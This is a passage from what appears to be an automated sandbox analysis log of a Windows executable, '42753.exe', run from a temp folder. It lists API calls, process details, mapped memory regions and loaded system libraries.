lpProcessInformation=0x12ff64 | out: lpCommandLine=0x0, lpProcessInformation=0x12ff64*(hProcess=0xcc, hThread=0xc8, dwProcessId=0xae4, dwThreadId=0xae8)) returned 1 [0050.203] WaitForSingleObject (hHandle=0xc0, dwMilliseconds=0xffffffff) returned 0x0 [0052.403] CloseHandle (hObject=0xcc) returned 1 [0052.403] CloseHandle (hObject=0xc8) returned 1 [0052.403] CloseHandle (hObject=0xc0) returned 1 [0052.403] CloseHandle (hObject=0xc4) returned 1 [0052.403] ExitProcess (uExitCode=0x0) Process: id = "4" image_name = "42753.exe" filename = "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe" page_root = "0x7eef76c0" os_pid = "0xae4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xad0" cmd_line = "\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe\"" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 745 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 746 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 747 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 748 start_va = 0x400000 end_va = 0x419fff entry_point = 0x401640 region_type = mapped_file name = "42753.exe" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe") Region: id = 749 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 750 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 751 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 752 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 753 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 754 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 755 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 756 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 757 start_va = 0x610000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 758 start_va = 0x5f9f0000 end_va = 0x5fb92fff entry_point = 0x5fa0e815 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 759 start_va = 0x6eb50000 end_va = 0x6ebd3fff entry_point = 0x6eb519a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 760 start_va = 0x70fc0000 end_va = 0x711fffff entry_point = 0x70fc66bd region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 761 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 762 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 763 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 764 start_va = 0x758a0000 end_va = 0x764e9fff entry_point = 0x75921601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 765 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 766 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 767 start_va = 0x76670000 end_va = 0x766eafff entry_point = 0x76671aee region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 768 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 769 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 770 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 771 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 772 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b59ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 773 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 774 start_va = 0x77140000 end_va = 0x7729bfff entry_point = 0x7718ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 775 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 776 start_va = 0x2c0000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 777 start_va = 0x773f0000 end_va = 0x773f4fff entry_point = 0x773f1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 778 start_va = 0x420000 end_va = 0x4e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 779 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 780 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 781 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 782 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 783 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 784 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 785 start_va = 0x13c0000 end_va = 0x13cffff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 786 start_va = 0x380000 end_va = 0x391fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 787 start_va = 0x3a0000 end_va = 0x3acfff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 788 start_va = 0x71a10000 end_va = 0x71a67fff entry_point = 0x71a113b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 789 start_va = 0x719c0000 end_va = 0x71a0efff entry_point = 0x719c1452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 790 start_va = 0x76f00000 end_va = 0x77035fff entry_point = 0x76f01b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 791 start_va = 0x77040000 end_va = 0x77134fff entry_point = 0x77041865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 792 start_va = 0x76c60000 end_va = 0x76e5afff entry_point = 0x76c622d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 793 start_va = 0x76ba0000 end_va = 0x76c2efff entry_point = 0x76ba3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 794 start_va = 0x755b0000 end_va = 0x756ccfff entry_point = 0x755b158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 795 start_va = 0x75460000 end_va = 0x7546bfff entry_point = 0x7546238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 796 start_va = 0x75320000 end_va = 0x7533afff entry_point = 0x753293b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 797 start_va = 0x13d0000 end_va = 0x169efff entry_point = 0x13d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 798 start_va = 0x3b0000 end_va = 0x3bcfff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 799 start_va = 0x74af0000 end_va = 0x74b06fff entry_point = 0x74af1c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 800 start_va = 0x753f0000 end_va = 0x753fafff entry_point = 0x753f1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 801 start_va = 0x74180000 end_va = 0x7418cfff entry_point = 0x741811e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 802 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 803 start_va = 0x1220000 end_va = 0x131ffff entry_point = 0x0 region_type = private name = "private_0x0000000001220000" filename = "" Region: id = 804 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 805 start_va = 0x3d0000 end_va = 0x3e8fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 806 start_va = 0x16a0000 end_va = 0x179ffff entry_point = 0x0 region_type = private name = "private_0x00000000016a0000" filename = "" Region: id = 807 start_va = 0x17a0000 end_va = 0x189ffff entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 808 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 809 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 810 start_va = 0x1320000 end_va = 0x137bfff entry_point = 0x1320000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 811 start_va = 0x1320000 end_va = 0x137bfff entry_point = 0x13435b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 812 start_va = 0x75340000 end_va = 0x7534bfff entry_point = 0x753410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 813 start_va = 0x739d0000 end_va = 0x73a0ffff entry_point = 0x739da2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 814 start_va = 0x18a0000 end_va = 0x199ffff entry_point = 0x0 region_type = private name = "private_0x00000000018a0000" filename = "" Region: id = 815 start_va = 0x19a0000 end_va = 0x1a6ffff entry_point = 0x0 region_type = private name = "private_0x00000000019a0000" filename = "" Region: id = 816 start_va = 0x1a70000 end_va = 0x1b4efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a70000" filename = "" Region: id = 817 start_va = 0x3d0000 end_va = 0x3d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 818 start_va = 0x742b0000 end_va = 0x7444dfff entry_point = 0x742de6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 819 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x3e0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 820 start_va = 0x3f0000 end_va = 0x3f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 821 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 822 start_va = 0x766f0000 end_va = 0x76772fff entry_point = 0x766f23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 823 start_va = 0x600000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 824 start_va = 0x74600000 end_va = 0x746f4fff entry_point = 0x74610d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 825 start_va = 0x74800000 end_va = 0x74820fff entry_point = 0x7480145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 826 start_va = 0x77420000 end_va = 0x77464fff entry_point = 0x774211e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 827 start_va = 0x1320000 end_va = 0x1323fff entry_point = 0x1320000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 828 start_va = 0x1330000 end_va = 0x1355fff entry_point = 0x1330000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db") Region: id = 829 start_va = 0x1360000 end_va = 0x1360fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001360000" filename = "" Region: id = 830 start_va = 0x1320000 end_va = 0x1323fff entry_point = 0x1320000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 831 start_va = 0x1370000 end_va = 0x139ffff entry_point = 0x1370000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 832 start_va = 0x13a0000 end_va = 0x13a3fff entry_point = 0x13a0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 833 start_va = 0x19a0000 end_va = 0x1a05fff entry_point = 0x19a0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 834 start_va = 0x1a30000 end_va = 0x1a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a30000" filename = "" Region: id = 835 start_va = 0x13b0000 end_va = 0x13b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 836 start_va = 0x13b0000 end_va = 0x13b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 837 start_va = 0x13b0000 end_va = 0x13b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 838 start_va = 0x13b0000 end_va = 0x13b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 839 start_va = 0x13b0000 end_va = 0x13b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 840 start_va = 0x13b0000 end_va = 0x13b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 841 start_va = 0x13b0000 end_va = 0x13b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 842 start_va = 0x13b0000 end_va = 0x13b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 843 start_va = 0x13b0000 end_va = 0x13b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 844 start_va = 0x13b0000 end_va = 0x13b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 845 start_va = 0x13b0000 end_va = 0x13b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 846 start_va = 0x13b0000 end_va = 0x13b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 847 start_va = 0x13b0000 end_va = 0x13b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 848 start_va = 0x13b0000 end_va = 0x13b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 849 start_va = 0x13b0000 end_va = 0x13b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 850 start_va = 0x13b0000 end_va = 0x13b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 851 start_va = 0x13b0000 end_va = 0x13b6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 852 start_va = 0x1a10000 end_va = 0x1a11fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a10000" filename = "" Region: id = 853 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 854 start_va = 0x1b50000 end_va = 0x1f42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b50000" filename = "" Region: id = 855 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 856 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 857 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 858 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 859 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 860 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 861 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 862 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 863 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 864 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 865 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 866 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 867 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 868 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 869 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 870 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 871 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 872 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 873 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 874 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 875 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 876 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 877 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 878 start_va = 0x1a20000 end_va = 0x1a20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a20000" filename = "" Region: id = 879 start_va = 0x754c0000 end_va = 0x754e6fff entry_point = 0x754c58b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 880 start_va = 0x756d0000 end_va = 0x756e1fff entry_point = 0x756d1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 881 start_va = 0x769a0000 end_va = 0x76b3cfff entry_point = 0x769a17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 882 start_va = 0x74e70000 end_va = 0x74e85fff entry_point = 0x74e72dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Thread: id = 30 os_tid = 0xae8 [0050.249] IsDebuggerPresent () returned 0 [0050.250] AreFileApisANSI () returned 1 [0050.250] SetFileApisToANSI () [0050.250] SetFileApisToOEM () [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.250] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 0x0 [0050.251] GetLastError () returned 